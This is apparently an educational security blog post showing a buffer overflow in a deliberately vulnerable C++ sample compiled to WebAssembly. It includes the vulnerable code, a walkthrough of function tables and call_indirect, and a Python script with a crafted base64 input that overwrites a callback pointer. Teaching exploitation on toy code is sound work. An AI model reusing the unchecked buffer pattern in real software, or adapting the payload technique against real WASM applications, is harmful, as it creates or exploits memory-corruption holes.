Basic WebAssembly buffer overflow exploitation

26th Jun 2022 webassembly exploitation buffer-overflow

WebAssembly is a binary format designed and optimized for high-performance execution on the web, although it can also be used in standalone applications. Even though WebAssembly uses sandboxed execution, certain types of bugs may still be exploitable within the context of the WASM binary. Depending on the layout of the entire application, its external calls, the presence of untrusted data inputs and other factors, the consequences of such a bug can range from minor to very severe.

Note: This blog post is not about exploiting WebAssembly itself. WebAssembly provides sandboxed execution, but it was never designed to prevent memory corruption within the application itself. We will go through the exploitation of a basic buffer overflow in an example application compiled to WebAssembly. Triggering a buffer overflow inside WebAssembly does not escape the sandbox and does not corrupt memory outside it; the only affected memory is the linear memory of the WebAssembly module.

Here we'll demonstrate a simple buffer overflow exploit in code intentionally written to be exploitable for the purpose of this blog post. Real world applications may require more or less work depending on circumstances.

Sample application code

// void Base64::Decode(const std::string& input, char* out);
#include "base64.hpp"

#include <cstdio>
#include <cstring> // std::memset
#include <string>

char* CallbackFunc_1()
{
    static char example_data[] = "some public data";

    return example_data;
}

char* CallbackFunc_2()
{
    static char example_data[] = "computed private data";

    return example_data;
}

struct ExampleStruct
{
    using DataProcessCallback = char*(*)();

    char name[32];
    DataProcessCallback cb;

    ExampleStruct(int type, char const* encoded_name)
    {
        if (type == 0)
            cb = CallbackFunc_1;
        else
            cb = CallbackFunc_2;

        std::memset(name, 0, sizeof(name));
        Base64::Decode(encoded_name, name);
    }
};

int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        std::printf("Usage: %s <type> <name>\n", argv[0]);
        return 1;
    }

    int type = std::stoi(argv[1]);

    ExampleStruct e(type, argv[2]);

    std::printf("Hello %s: %s\n", e.name, e.cb());

    return 0;
}

The code is intentionally kept simple and contains a bug for the purpose of the example. The application takes two arguments: an integer and a base64-encoded string. ExampleStruct is then initialized using these arguments: the integer selects which callback function is stored, and the base64 string is decoded into the name field. Further in the code, we print the name and the output of the callback.

The code is structured this way only to get the required functionality in the simplest possible way. Let's pretend that the integer is not console input, that we cannot provide it through command line arguments, and that we are limited to the value 0, which gives us the output of the first callback function ("some public data").

Compiling and running the application

$ mkdir out
$ emcc -O2 example.cpp -o out/example.js
$ echo -n 'John Doe' | base64
Sm9obiBEb2U=
$ node out/example.js 0 Sm9obiBEb2U=
Hello John Doe: some public data
$ node out/example.js 1 Sm9obiBEb2U=
Hello John Doe: computed private data

The bug

The structure has a char[] name field with a hardcoded size of 32. The Base64::Decode() function takes a char* pointer to the output buffer and performs no bounds checks, so base64 input that decodes to more than 32 bytes is written past the end of the buffer. The callback member follows the name field, meaning that any overflow of the name field overwrites the callback pointer.
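To make the missing check concrete, here is a minimal Python sketch of the size comparison that Base64::Decode() never performs. The helper names decoded_size and overflow_bytes are hypothetical and exist only for this illustration; the 32-byte capacity comes from the name field in the sample code.

```python
import base64

NAME_FIELD_SIZE = 32  # sizeof(ExampleStruct::name) in the sample code


def decoded_size(encoded: str) -> int:
    """Number of bytes the base64 string expands to once decoded."""
    return len(base64.b64decode(encoded))


def overflow_bytes(encoded: str, capacity: int = NAME_FIELD_SIZE) -> int:
    """How many decoded bytes would land past the end of the name field."""
    return max(0, decoded_size(encoded) - capacity)


# "John Doe" decodes to 8 bytes and fits in the field.
print(overflow_bytes("Sm9obiBEb2U="))

# A 36-byte input spills 4 bytes into the member that follows name.
oversized = base64.b64encode(b"A" * 36).decode("ascii")
print(overflow_bytes(oversized))
```

A decoder that took the buffer capacity as a parameter and rejected inputs for which this difference is non-zero would close the bug.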

Introduction to relevant executable format details

If you are familiar with writing exploits on x86/x64 architectures with modern operating systems, you're aware that the same type of bug is exploitable there. However, because of ASLR, exploiting it on such platforms would also require an info leak to obtain a valid function (or any other code) address.

In WebAssembly, things work slightly differently. For a start, there's no ASLR. Functions are referred to by their indexes rather than addresses. Unlike x86/x64, where you can call any valid executable address (a function address, an address in the middle of a function, or simply any address in executable memory), you can only call into existing functions. WebAssembly also enforces that called functions are of the expected type. The binary format contains a type section that describes all function prototypes (argument types and return values).

For example:

$ ~/wabt/bin/wasm2wat out/example.wasm > example.wat

If we inspect the wat file, which is a textual representation of the module and its instructions, we'll see the following type section:

(type (;0;) (func (param i32) (result i32)))
(type (;1;) (func (param i32 i32 i32)))
(type (;2;) (func (param i32)))
(type (;3;) (func (param i32 i32 i32) (result i32)))
(type (;4;) (func (param i32 i32)))
(type (;5;) (func (param i32 i32 i32 i32)))
(type (;6;) (func (result i32)))
(type (;7;) (func (param i32 i32 i32 i32 i32)))
(type (;8;) (func (param i32 i32 i32 i32 i32 i32)))
(type (;9;) (func))
(type (;10;) (func (param i32 i32) (result i32)))
(type (;11;) (func (param i32 i32 i32 i32 i32) (result i32)))
(type (;12;) (func (param i32 i64 i32) (result i64)))
(type (;13;) (func (param i32 i32 i32 i32) (result i32)))
(type (;14;) (func (param i32 f64 i32 i32 i32 i32) (result i32)))

Further, if we go to the bottom of the file and look around the data sections, we'll locate the strings we've used in the example:

(data (;14;) (i32.const 2624) "some public data")
(data (;15;) (i32.const 2656) "computed private data\00\00\00\05")

Going through the code, we can easily locate the two callback functions by searching for the addresses of these data sections, 2624 and 2656:

(func (;10;) (type 6) (result i32)
  i32.const 2624)
(func (;11;) (type 6) (result i32)
  i32.const 2656)

Our callback functions have indexes 10 and 11. We want to make the code call function 11 by overwriting the pointer that currently refers to function 10. Function pointers work differently in WebAssembly than on x86/x64 and similar architectures, where a function pointer is the address of the function. A WebAssembly function pointer is neither an "address" nor the function's index; it is an index into the function table, which is populated by the elem section (in this module, starting from 1).

Table section:

(table (;0;) 24 24 funcref)

Elem section:

(elem (;0;) (i32.const 1) func 11 10 17 16 18 38 39 51 55 21 21 56 55 58 70 68 61 55 69 67 62 55 63)

We can conclude that func_11 (CallbackFunc_2) has elem index 1 and func_10 (CallbackFunc_1) has elem index 2.
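The same conclusion can be reached mechanically. The sketch below is only an illustration: it hardcodes the offset and the function list copied from the elem line above and builds the table slot to function index mapping. The helper name pointer_values is hypothetical.

```python
# Values copied from the (elem ...) line of example.wat shown above.
ELEM_OFFSET = 1
ELEM_FUNCS = [11, 10, 17, 16, 18, 38, 39, 51, 55, 21, 21, 56,
              55, 58, 70, 68, 61, 55, 69, 67, 62, 55, 63]

# table slot -> function index; the slot is the value a function pointer holds
table = {ELEM_OFFSET + i: func for i, func in enumerate(ELEM_FUNCS)}


def pointer_values(func_index):
    """All table slots (function pointer values) that refer to func_index."""
    return [slot for slot, func in table.items() if func == func_index]


print("CallbackFunc_1 (func 10):", pointer_values(10))
print("CallbackFunc_2 (func 11):", pointer_values(11))
```

Some functions, such as 55 and 21, occupy more than one slot, so one function can be reachable through several pointer values.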

For demonstration purposes, we can print the addresses of the two functions by adding the following code to the beginning of the main() function:

std::printf("CallbackFunc_1: %p, CallbackFunc_2: %p\n", &CallbackFunc_1, &CallbackFunc_2);

And after executing the application, we'll get the following output:

$ node out/example.js
CallbackFunc_1: 0x2, CallbackFunc_2: 0x1

The compiler populates the elem section with the indexes of all functions whose addresses are taken (e.g. assignment to a pointer, printing to console, etc.). You cannot redirect a function pointer to a function that exists within the module but is not referenced in the elem section.

WebAssembly is a stack-based virtual machine. Direct calls are performed using the call instruction. For example, if we were calling function 10 directly, we'd have the following code:

call 10

Our function takes no arguments, but if it took two 32-bit integers, we'd have the following code:

i32.const 0
i32.const 0
call 10

And the stack would look like this:

[ previous items ]
0
0

This would call func_10(0, 0). The call consumes both arguments; if the function returns a value, that value is on top of the stack once the call instruction has finished executing.

But we're not dealing with direct calls in the vulnerable code example, we're dealing with indirect calls which use a different instruction, call_indirect.

i32.load offset=32
call_indirect (type 6)

The i32.load instruction pushes the callback pointer onto the stack. Note the (type 6) operand, which is the expected type of the pointed-to function. When executing call_indirect, the WebAssembly runtime verifies that the function it is about to call matches the type given as the operand. If there is a mismatch, you get a runtime error, meaning that you cannot call arbitrary functions that have different prototypes.

If the function took two integer arguments and still returned an integer, the above example would look like this, with the type operand changed to match the new prototype (type 10 in the type section shown earlier):

i32.const 0
i32.const 0
i32.load offset=32
call_indirect (type 10)

And the stack would look like this:

[ previous items ]
0
0
elem index
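The check performed by call_indirect can be modelled with a short Python sketch. This is a toy model, not how any real runtime is implemented. Slots 1 and 2 and type 6 come from the module above; the function placed at slot 3 and its assignment to type 2 are hypothetical stand-ins, since the post does not show the real prototype of that entry. The Trap class and the Python lambdas are also illustration-only.

```python
# Function types as (params, results); both are taken from the type section.
TYPES = {
    6: ((), ("i32",)),   # (func (result i32))
    2: (("i32",), ()),   # (func (param i32))
}

# table slot -> (name, type index, Python stand-in for the function body)
TABLE = {
    1: ("CallbackFunc_2", 6, lambda: 2656),
    2: ("CallbackFunc_1", 6, lambda: 2624),
    3: ("hypothetical_other", 2, lambda x: None),  # assumed prototype
}


class Trap(Exception):
    """Stand-in for the RuntimeError raised by a real WebAssembly runtime."""


def call_indirect(stack, expected_type):
    slot = stack.pop()                      # the "function pointer"
    if slot not in TABLE:
        raise Trap("table index out of bounds or empty slot")
    name, type_index, body = TABLE[slot]
    if TYPES[type_index] != TYPES[expected_type]:
        raise Trap("function signature mismatch")
    params, results = TYPES[type_index]
    args = [stack.pop() for _ in params][::-1]  # arguments sit below the slot
    value = body(*args)
    if results:
        stack.append(value)


stack = [1]                 # overwritten pointer value
call_indirect(stack, 6)
print(stack)                # address of "computed private data"
```

Calling call_indirect([3], 6) in this model raises Trap, because the function at slot 3 does not have the type the call site expects.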

Exploitation

We have a 32-byte char array, followed by a 32-bit "pointer". If the input name is "John Doe", the struct has the following layout in memory ("John Doe", 24 zero bytes, then 4 bytes for the pointer value 2):

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  4A 6F 68 6E 20 44 6F 65 00 00 00 00 00 00 00 00  John Doe........
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  02 00 00 00                                      ....

We want to replace 02 with 01, which is the elem index of CallbackFunc_2:

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  4A 6F 68 6E 20 44 6F 65 00 00 00 00 00 00 00 00  John Doe........
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  01 00 00 00                                      ....
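The two layouts can be reproduced with Python's struct module. This is a sketch that assumes what the dumps above show: a little-endian 32-bit target with no padding between name and cb, which matches the offset=32 used by the i32.load instruction.

```python
import struct

# '<'   little-endian, no alignment padding
# '32s' char name[32], zero-padded by struct
# 'I'   32-bit cb "pointer" (a table index)
LAYOUT = struct.Struct("<32sI")

original = LAYOUT.pack(b"John Doe", 2)  # cb -> CallbackFunc_1
target = LAYOUT.pack(b"John Doe", 1)    # cb -> CallbackFunc_2

# Offsets at which the two images differ
changed = [i for i, (a, b) in enumerate(zip(original, target)) if a != b]

print("struct size:", LAYOUT.size)
print("differing offsets:", changed)
```

Only the byte at offset 0x20 differs, so the exploit needs to control exactly one byte past the 32-byte name field; the remaining three pointer bytes are already zero.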

A Python script that generates the whole input for us:

#!/usr/bin/python3

import base64

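# Name, padded with zero bytes to fill the 32-byte name field
data = b'John Doe'.ljust(32, b'\x00')

# Little-endian 32-bit elem index of CallbackFunc_2, which lands on cb
data += b'\x01\x00\x00\x00'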

print(base64.b64encode(data).decode('utf-8'))

Running the payload:

$ ./make_payload.py
Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA
$ node out/example.js 0 Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAA
Hello John Doe: computed private data

If we change the script to generate data for an index in the elem table whose function has a different prototype, we get the runtime error described earlier in this post:

# index 3
$ node out/example.js 0 Sm9obiBEb2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAA
[ ... ]
RuntimeError: function signature mismatch
at main (<anonymous>:wasm-function[12]:0x926)
[ ... ]
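To try other table indexes without editing the script each time, the payload generation can be parameterised. This is a sketch under the same layout assumptions as before (32-byte name followed by a little-endian 32-bit index); the function name make_payload is hypothetical.

```python
import base64
import struct


def make_payload(table_index: int, name: bytes = b"John Doe") -> str:
    """Base64 input that fills name and overwrites cb with table_index."""
    if len(name) > 32:
        # struct would silently truncate a longer name, so reject it here
        raise ValueError("name must fit in the 32-byte field")
    raw = struct.pack("<32sI", name, table_index)
    return base64.b64encode(raw).decode("ascii")


# Indexes 1 and 2 are the two callbacks; 3 is the mismatching entry used above.
for index in (1, 2, 3):
    print(index, make_payload(index))
```

Each generated string can be passed as the second argument to node out/example.js to observe either a redirected call or the signature mismatch error.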

Conclusion

WebAssembly provides sandboxed execution for the web, which by itself provides significant security. On a website that doesn't consume external untrusted data (e.g. data retrieved from an API provided by a third-party host), a bug such as the one described in this post would not be of high severity: the website itself would have to feed the "vulnerable" data to the WASM module through JavaScript, and the entity hosting the website can already execute any valid WASM code and has no need to exploit its own bugs.

However, if the website retrieves data from a third-party API/website/service through JavaScript and feeds it into the WASM module, such a bug may be of high severity, depending on what further exploitation the module allows, because the third-party host may cause unintended execution. The same goes for standalone WASM applications (e.g. running on servers) that consume untrusted data from a public API, where such a bug could have more severe consequences.

A buffer overflow such as this one may be much easier to exploit in WebAssembly than in an application compiled for x86/x64, where ASLR, DEP and other mitigations stand in the way, but only if a number of requirements are met. Meaningful exploitation, rather than just a DoS, is possible only if the set of functions available for redirection provides meaningful execution. Exploiting a bug in a real-world WASM application may require significantly more work than we went through in this post (which was intentionally kept simple for easier demonstration).

Hopefully you've enjoyed reading and found the topic interesting. We will try to cover other exploitation techniques in the context of WebAssembly in the future, covering different types of bugs and requirements for their exploitation.

In addition to reverse engineering and exploitation in WebAssembly, we will also cover code obfuscation, with examples from our WebAssembly obfuscator, which is being finished and will be available for production use in the near future. Make sure to also check out our main website.